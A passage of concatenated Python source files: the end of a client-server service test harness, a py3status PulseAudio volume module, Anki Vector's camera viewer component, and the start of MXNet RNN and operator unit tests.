client.interpret("echo hello")
failure[test] = "Requesting service should fail."
except exceptions.ClientNotRegisteredError:
success.add(test)
client.open()
print "Starting server Testing..."
test = "serviceNotProvidedError"
try:
try:
client.allowService("asdkjhasdkjh")
failure[test] = "somehow registered service with random name..."
except exceptions.ServiceNotProvidedError:
success.add(test)
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "allowAllServices"
try:
client.allowAllServices()
try:
client.interpret("echo hello")
success.add(test)
except exceptions.ServiceNotRegisteredError:
failure[test] = "allowAllServices did not enable echo service"
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "disallowService"
try:
client.disallowService("echo")
try:
client.interpret("echo hello")
failure[test] = "disallowService did not disable echo service"
except exceptions.ServiceNotRegisteredError:
success.add(test)
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "allowService"
try:
client.allowService("echo")
try:
client.interpret("echo hello")
success.add(test)
except exceptions.ServiceNotRegisteredError:
failure[test] = "allowService did not enable echo service"
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "isService"
try:
if client.isService("echo"):
success.add(test)
else:
failure[test] = "Failed to determine echo as a service"
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "getAvailableServices"
try:
if len(client.getAvailableServices()) > 0:
success.add(test)
else:
failure[test] = "No available services"
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
if len(success) > 0:
print "Successful execution for:"
for script in success:
print " ", script
if len(failure) > 0:
print
print "Failed execution for:"
for key in failure:
print " ", key, ":", failure[key]
client.close()
except pyro.ClientException as tx:
print 'Client exception encountered: ' + tx.message
server.daemon.shutdown()
def test_pyro():
from automaton.server.pyro import PyroServer
import automaton.client.pyro as pyro
print "Starting Pyro Server"
server = PyroServer(port = 9092)
server.initialize()
thread = threading.Thread(target=server.start)
thread.daemon = True
thread.start()
time.sleep(3) # wait for server to initialize
try:
client = pyro.ClientWrapper(appname="testharness",port=9092)
client.open()
print "Starting Pyro Testing..."
test_client(client)
client.close()
except pyro.ClientException as tx:
print 'Client exception encountered: ' + tx.message
server.daemon.shutdown()
def test_thrift():
from automaton.server.thrift import ThriftServer
import automaton.client.thrift as thrift
print "Starting Thrift Server"
server = ThriftServer(port = 9091)
server.initialize()
thread = threading.Thread(target=server.start)
thread.daemon = True
thread.start()
time.sleep(3) # wait for server to initialize
try:
client = thrift.ClientWrapper(appname="testharness",port=9091)
client.open()
print "Starting Thrift Testing..."
test_client(client)
client.close()
except thrift.ClientException as tx:
print 'Client exception encountered: ' + tx.message
if __name__ == "__main__":
#test_server()
#test_pyro()
test_thrift()
|
volume_pa_status.py
|
# -*- coding: utf-8 -*-
"""
Pulse Audio Volume control.
@author <Vlad Vasiliu> <vladvasiliu@yahoo.fr>
@license BSD
"""
from __future__ import annotations
import logging
import math
from dataclasses import dataclass
import threading
from typing import Callable, Iterable, Optional, Union
from pulsectl import Pulse, PulseEventMaskEnum, PulseEventTypeEnum, PulseEventFacilityEnum, PulseSinkInfo, \
PulseDisconnected, PulseLoopStop
from py3status.composite import Composite
from py3status.py3 import Py3
logger = logging.getLogger("main")
logging.basicConfig(level=logging.DEBUG)
@dataclass(frozen=True)
class Volume:
"""Holds normalized (integer) volume and mute status
The volume will be displayed as an integer. The output will only be updated if the value changes.
Therefore we do the conversion here so as to avoid "false positives" due to float comparisons.
As the sink returns a volume level per channel, which is basically a list of values,
those values must be aggregated into a single value.
By default `max` is called, but this can be replaced with any function that takes an iterable of floats and returns
a float.
Volume is a positive integer:
* 0: No sound
* 100: 100% hardware level
* >100: software amplification
See PulseAudio documentation for volume levels (https://freedesktop.org/software/pulseaudio/doxygen/volume.html).
"""
level: int
mute: bool
@classmethod
def from_sink_info(cls, sink_info: PulseSinkInfo, cmp: Callable[[Iterable], float] = max) -> Volume:
float_vol = cmp(sink_info.volume.values)
return cls(level=round(100 * float_vol), mute=bool(sink_info.mute))
class Py3status:
py3: Py3
blocks = u"_▁▂▃▄▅▆▇█"
button_down = 5
button_mute = 1
button_up = 4
format = u"{icon} {percentage}%"
format_muted = u"{icon} {percentage}%"
is_input = False
max_volume = 100
thresholds = [(0, "good"), (75, "degraded"), (100, "bad")]
volume_delta = 5
def __init__(self, sink_name: Optional[str] = None, volume_boost: bool = False):
"""
:param sink_name: Sink name to use. Empty uses default sink
:param volume_boost: Whether to allow setting volume above 1.0 - uses software boost
"""
self._sink_name = sink_name
self._sink_info: Optional[PulseSinkInfo]
self._volume_boost = volume_boost
self._pulse_connector = Pulse('py3status-pulse-connector', threading_lock=True)
self._pulse_connector_lock = threading.Lock()
self._volume: Optional[Volume] = None
self._backend_thread = threading.Thread
def _get_volume_from_backend(self):
"""Get a new sink on every call.
The sink is not updated when the backed values change.
Returned volume is the maximum of all available channels.
"""
sink_name = self._pulse_connector.server_info().default_sink_name
self._sink_info = self._pulse_connector.get_sink_by_name(sink_name)
pulse_volume = Volume.from_sink_info(self._sink_info)
logger.debug(pulse_volume)
if self._volume != pulse_volume:
self._volume = pulse_volume
self.py3.update()
def _callback(self, ev):
if ev.t == PulseEventTypeEnum.change and \
(ev.facility == PulseEventFacilityEnum.server or
ev.facility == PulseEventFacilityEnum.sink and ev.index == self._sink_info.index):
raise PulseLoopStop
def _pulse_reader(self):
while True:
try:
self._pulse_connector.event_listen()
self._get_volume_from_backend()
except PulseDisconnected:
logger.debug("Pulse disconnected. Stopping reader.")
break
def post_config_hook(self):
self._pulse_connector.connect()
self._get_volume_from_backend()
self._pulse_connector.event_mask_set(PulseEventMaskEnum.server, PulseEventMaskEnum.sink)
self._pulse_connector.event_callback_set(self._callback)
self._backend_thread = threading.Thread(name="pulse_backend", target=self._pulse_reader).start()
def kill(self):
logger.info("Shutting down")
self._pulse_connector.disconnect()
def _color_for_output(self) -> str:
if self._volume is None:
return self.py3.COLOR_BAD
if self._volume.mute:
return self.py3.COLOR_MUTED or self.py3.COLOR_BAD
return self.py3.threshold_get_color(self._volume.level)
def _icon_for_output(self) -> str:
return self.blocks[
min(
len(self.blocks) - 1,
int(math.ceil(self._volume.level / 100 * (len(self.blocks) - 1))),
)
]
def _format_output(self) -> Union[str, Composite]:
return self.py3.safe_format(format_string=self.format_muted if self._volume.mute else self.format,
param_dict={"icon": self._icon_for_output(),
"percentage": self._volume.level})
def volume_status(self):
response = {
"cached_until": self.py3.CACHE_FOREVER,
"color": self._color_for_output(),
"full_text": self._format_output()
}
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
# with PulseController() as pc:
# pc.run()
#
# while True:
# sleep(10)
from py3status.module_test import module_test
module_test(Py3status)
|
viewer.py
|
# Copyright (c) 2018 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Displays camera feed from Vector's camera.
"""
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['ViewerComponent']
import asyncio
import multiprocessing as mp
import sys
try:
import cv2
except ImportError as exc:
sys.exit("Cannot import opencv-python: Do `pip3 install opencv-python` to install")
try:
import numpy as np
except ImportError as exc:
sys.exit("Cannot import numpy: Do `pip3 install numpy` to install")
try:
from PIL import Image
except ImportError:
sys.exit("Cannot import from PIL: Do `pip3 install --user Pillow` to install")
from . import util
class ViewerComponent(util.Component):
"""This component opens a window and renders the images obtained from Vector's camera.
This viewer window is run in a separate process spawned by :func:`~ViewerComponent.show_video`.
Being on a separate process means the rendering of the camera does not block the main thread
of the calling code, and allows the viewer to have its own ui thread which it can operate on.
:func:`~ViewerComponent.stop_video` will stop the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_camera_feed=True, show_viewer=True) as robot:
time.sleep(5)
:param robot: A reference to the owner Robot object. (May be :class:`None`)
"""
def __init__(self, robot):
super().__init__(robot)
self.overlays: list = []
self._frame_queue: mp.Queue = None
self._loop: asyncio.BaseEventLoop = None
self._process = None
def show_video(self, timeout: float = 10.0) -> None:
"""Render a video stream using the images obtained from
Vector's camera feed.
Be sure to create your Robot object with the camera feed enabled
by using "show_viewer=True" and "enable_camera_feed=True".
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_camera_feed=True) as robot:
robot.viewer.show_video()
time.sleep(10)
:param timeout: Render video for the given time. (Renders forever, if timeout not given)
"""
ctx = mp.get_context('spawn')
self._frame_queue = ctx.Queue(maxsize=4)
self._process = ctx.Process(target=ViewerComponent._render_frames, args=(self._frame_queue, self.overlays, timeout), daemon=True)
self._process.start()
def stop_video(self) -> None:
"""Stop rendering video of Vector's camera feed and close the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(show_viewer=True) as robot:
time.sleep(10)
robot.viewer.stop_video()
"""
if self._frame_queue:
self._frame_queue.put(None, False)
self._frame_queue = None
if self._process:
self._process.join(timeout=5)
self._process = None
def enqueue_frame(self, image: Image.Image):
"""Sends a frame to the viewer's rendering process. Sending `None` to the viewer
will cause it to gracefully shutdown.
.. note::
This function will be called automatically from the camera feed when the
:class:`~anki_vector.robot.Robot` object is created with ``enable_camera_feed=True``.
.. code-block:: python
import anki_vector
from PIL.Image import Image
image = Image()
with anki_vector.Robot(show_viewer=True) as robot:
robot.viewer.enqueue_frame(image)
:param image: A frame from Vector's camera.
"""
if self._frame_queue is not None:
try:
self._frame_queue.put(image, False)
except mp.queues.Full:
pass
def _apply_overlays(self, image: Image.Image) -> None:
"""Apply all overlays attached to viewer instance on to image from camera feed."""
for overlay in self.overlays:
overlay.apply_overlay(image)
return image
@staticmethod
def _render_frames(queue: mp.Queue, overlays: list = None, timeout: float = 10.0) -> None:
"""Rendering the frames in another process. This allows the UI to have the
main thread of its process while the user code continues to execute.
:param queue: A queue to send frames between main thread and other process.
:param overlays: overlays to be drawn on the images of the renderer.
:param timeout: The time without a new frame before the process will exit.
"""
window_name = "Vector Camera Feed"
cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)
try:
image = queue.get(True, timeout=timeout)
while image:
if overlays:
for overlay in overlays:
overlay.apply_overlay(image)
image = cv2.cvtColor(np.array(image), cv2.COLOR_BGR2RGB)
cv2.imshow(window_name, image)
cv2.waitKey(1)
if cv2.getWindowProperty(window_name, cv2.WND_PROP_VISIBLE) < 1:
break
image = queue.get(True, timeout=timeout)
except TimeoutError:
pass
except KeyboardInterrupt:
pass
cv2.destroyWindow(window_name)
cv2.waitKey(1)
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process, xfail_when_nonstandard_decimal_separator
import pytest
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if type(grad_req) is dict and grad_req['data'] == 'null' or grad_req == 'null':
assert(mod1.get_input_grads()[0] == None)
assert(mod2.get_input_grads()[0] == None)
else:
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_lstm_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_lstm_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
check_rnn_consistency(fused, stack, T, N, I, H, {'data': 'add', 'parameters': 'null'})
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_gru_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_gru_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnntanh_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnntanh_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnnrelu_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
